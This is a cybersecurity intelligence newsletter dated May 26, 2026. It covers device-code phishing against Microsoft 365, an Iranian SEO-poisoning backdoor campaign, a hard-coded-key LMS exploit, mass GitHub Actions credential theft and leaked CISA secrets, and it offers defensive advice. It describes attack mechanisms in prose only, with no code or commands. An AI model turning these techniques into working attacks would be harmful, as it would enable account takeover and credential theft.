The Lyceum: Cyber Intelligence Daily — May 26, 2026

Today's signal is not "one giant breach" — it's "the attack surface is wherever people got comfortable." A phishing kit is turning Microsoft's own login flow into an MFA bypass, an Iranian IRGC-linked crew is poisoning Bing search results to deliver an AI-coded backdoor, a niche Japanese learning platform got turned into a malware launcher because someone hard-coded a cryptographic key, and 5,500 GitHub repos got vacuumed for secrets in six hours. The throughline: attackers are skipping the front door entirely and walking in through the training portal, the search bar, and the CI/CD pipeline.

• CVE-2026-5426 — Digital Knowledge KnowledgeDeliver LMS: patched, exploited as a zero-day. Hard-coded ASP.NET machineKey values across deployments enabled unauthenticated RCE leading to Godzilla webshell and Cobalt Strike deployment.
• CVE-2026-26980 — Ghost CMS: patched in 6.19.1, actively exploited at scale. SQL injection used to steal admin API keys and inject malicious JavaScript across 700+ sites including university, fintech, and AI publishers.
• CVE-2026-34472 / CVE-2026-34473 / CVE-2026-34474 — ZTE ZXHN H-series CPE routers: no confirmed patch for operator firmware. Unauthenticated info disclosure of admin/WLAN/PPPoE credentials plus oversized-POST DoS across 17 router models distributed by ISPs globally.
• MiniFast backdoor — Iran/IRGC-aligned Nimbus Manticore: actively deployed via SEO-poisoned fake SQL Developer download page. 64-bit Windows backdoor that masquerades C2 traffic as Chrome activity; code style suggests AI-assisted development.
• Kali365 PhaaS — Microsoft 365: actively exploited. Phishing-as-a-service kit sold on Telegram that abuses Microsoft's legitimate device-code login flow to capture OAuth tokens, bypassing MFA without ever phishing a password.
• Windows Snipping Tool NTLMv2 hash hijack — Exploit-DB entry published, no CVE assigned yet. Local privilege escalation path that captures NTLMv2 hashes via a default-installed Windows utility.

The FBI issued a public service announcement overnight on Kali365 — a phishing-as-a-service kit sold through Telegram since April 2026 that hands low-skill criminals the ability to hijack Microsoft 365 sessions without stealing a password, without intercepting an SMS code, and without ever building a fake login page.

The mechanism is what makes this nasty. Victims are sent to Microsoft's real device-code authentication page — the legitimate one — and prompted to enter a short code. That code actually authorizes the attacker's device, not the victim's. When the victim completes sign-in, the criminal gets OAuth access and refresh tokens — a reusable hall pass to Outlook, Teams, OneDrive, and any other linked app. There is no fake page to spot. There is no MFA prompt to second-guess. The user did, in fact, log into Microsoft.

What changes if this works at scale: the entire "train users to spot phishing pages" defensive posture stops mattering for Microsoft 365 because there is no phishing page to spot. The FBI says Kali365 ships with AI-written lures, campaign templates, real-time victim tracking, and token capture — Phishing-as-a-Service has now matured into something closer to Salesforce-for-criminals.

What to watch: if enterprise breach reports over the next two weeks start citing "device-code abuse" as the initial vector, restricting device-code authentication via Conditional Access becomes the new "disable SMB v1" — a one-line config change that retroactively explains a lot of compromises.

Check Point Research dropped a detailed report overnight on Nimbus Manticore (also tracked as UNC1549) — an IRGC-affiliated Iranian threat group that ran three distinct attack waves between February and April 2026, timed to Operation Epic Fury, the U.S. military campaign against Iran. The targets: aviation, defense, telecom, and software firms across the United States, Europe, and the Middle East.

The new technique is what defenders should pay attention to. For the first time, Check Point observed Nimbus Manticore using SEO poisoning — manipulating search rankings so the attacker's malicious download page appears at the top of results. The group registered getsqldeveloper[.]com, a near-perfect impersonation of Oracle's SQL Developer download page, and at the time of analysis it ranked near the top of Bing and DuckDuckGo results for "sql developer." No phishing email. No social engineering pretext. Just a developer doing what developers do — searching for a tool — and getting a weaponized installer that drops a new backdoor called MiniFast.

MiniFast is a 64-bit Windows backdoor that disguises its C2 traffic as Chrome browser activity. It runs shell commands, manages files, exfiltrates data, and attempts privilege escalation. Check Point notes that the code shows hallmarks of AI-assisted development — excessive error handling, verbose function names, detailed debug strings — patterns common in LLM-generated code. That inference deserves caution; code style is suggestive, not conclusive.

What changes: if searching for the tool you need becomes a credible initial access vector for nation-state actors, every developer workstation is now part of the threat model in a way that perimeter controls don't address. Defenders should monitor for unexpected scheduled task creation and unusual DLL loading — the operational tells Check Point flagged for this campaign.

Training software rarely makes headlines until it starts serving malware to whoever visits it. Google Mandiant and Google Threat Intelligence Group disclosed overnight that a flaw in Digital Knowledge's KnowledgeDeliver — a learning management system widely used in Japan — was exploited as a zero-day to plant the Godzilla webshell and push Cobalt Strike Beacon onto end-user machines. Deployments prior to February 24, 2026, are affected.

The bug is CVE-2026-5426, rated 7.5, and the root cause sounds boring until you sit with it: hard-coded ASP.NET machineKey values shipped across customer deployments. One shared secret meant a key learned from one KnowledgeDeliver install could forge authenticated requests against every other. Per Mandiant's findings, attackers used the flaw for unauthenticated RCE, loosened file permissions, modified a legitimate JavaScript file on the LMS, and then served users a fake "security authentication plugin" prompt that delivered malware. A server compromise became a client compromise — one shared secret, many victims.

What changes if more vendors are found shipping shared keys in deployment templates: this stops being a Japan-only story. The "hard-coded crypto material in shared software" failure mode is the same class of bug that turned Salt Communications, Atlassian Bitbucket, and a half-dozen other vendors into one-key-fits-all environments over the past 18 months. The observable signal: if Mandiant or JPCERT publish additional victim names this week, the surface area is bigger than one LMS.

If you run KnowledgeDeliver or any customer does — verify versioning, rotate shared secrets, audit JavaScript files for unauthorized modification, and ask users whether they were prompted to install anything.

This is the kind of supply-chain story that makes developers stare into the middle distance for a minute. SecurityWeek, citing SafeDep, reports that 5,718 malicious commits hit 5,561 GitHub repositories in just six hours on May 18. The injected GitHub Actions workflows were designed to vacuum up everything that lives in a CI/CD environment: AWS, Azure, and Google Cloud credentials, SSH keys, API tokens, database connection strings, Docker and Kubernetes configs. One payload established a dormant backdoor using GitHub Actions' workflow_dispatch trigger — an attacker-callable persistence mechanism that sits in your repo waiting for an API call.

What changes: the trust model under CI/CD pipelines was already fraying — the Shai-Hulud worm, the TanStack mess, the VS Code extension breach that hit GitHub's own internal repos — and Megalodon is the same playbook automated to industrial scale. Your build pipeline is now a credential reservoir attackers can drain in a single afternoon.

What failure looks like: if SafeDep's victim count keeps climbing this week, expect a forced credential rotation event across the major cloud providers — the kind that breaks production and dominates ops Slack channels for three days. The observable signal: GitHub announces additional commit-signing or workflow-execution restrictions, the way they did after Shai-Hulud.

Russian-language outlet Xakep reported overnight that CISA — the U.S. Cybersecurity and Infrastructure Security Agency, the federal body that tells everyone else to clean up their secret hygiene — left credentials and other sensitive material in a public GitHub repository. This builds on Brian Krebs's earlier reporting from May that flagged CISA's DevSecOps credentials in a public repo, but Xakep's coverage is the first to surface the additional secrets and the broader scope of the exposure. The agency whose May 27 KEV deadline is forcing federal agencies to patch CVE-2026-9082 (Drupal SQL injection) by tomorrow night is also the agency whose own GitHub hygiene now warrants its own incident report. Source: Xakep.ru — Russian. No English-language coverage confirmed at time of publication.

Ukraine's national CERT published a fresh advisory cataloging three new malware families deployed by the cluster it tracks as UAC-0057, a group long associated with Belarus-aligned operations against Ukrainian and EU institutions. The advisory describes a phishing wave using Prometheus-themed lures against Ukrainian government targets, with the OYSTER family providing initial access, persistence, and lateral movement capabilities. The naming convention — OYSTERFRESH, OYSTERSHUCK, OYSTERBLUES — suggests a deliberate operational refresh rather than incremental updates, and the timing aligns with the broader UAC-0057 tempo CERT-UA has documented through the spring. Western threat intel hasn't echoed this advisory yet, but the IOCs are publishable and the TTPs map cleanly onto prior UAC-0057 campaigns. Source: CERT-UA — Ukrainian. No English-language coverage confirmed at time of publication.

Xakep's overnight coverage of the Megalodon supply-chain attack adds detail to SafeDep's English-language disclosure: the attack used compromised maintainer credentials and automated commit-injection workflows to push malicious GitHub Actions across thousands of repos in a six-hour window. The Russian-language coverage includes specific technical detail on the workflow_dispatch backdoor mechanism and the credential-harvesting payload structure that hasn't surfaced in English reporting yet. Source: Xakep.ru — Russian. No English-language coverage confirmed at time of publication.

Tonight: an Iranian operator typing "make this backdoor look more like Chrome" into a chatbot, 5,561 GitHub repos getting frisked in the time it takes to watch The Godfather, and the FBI explaining that Microsoft's real login page is now the phishing page. CISA, meanwhile, is busy enforcing tomorrow's KEV deadline from a GitHub repo it apparently forgot to set to private.

Stay skeptical of the login that worked.

Forward this to the developer in your life who just searched for "sql developer download" — they'll want to know before their next Bing result.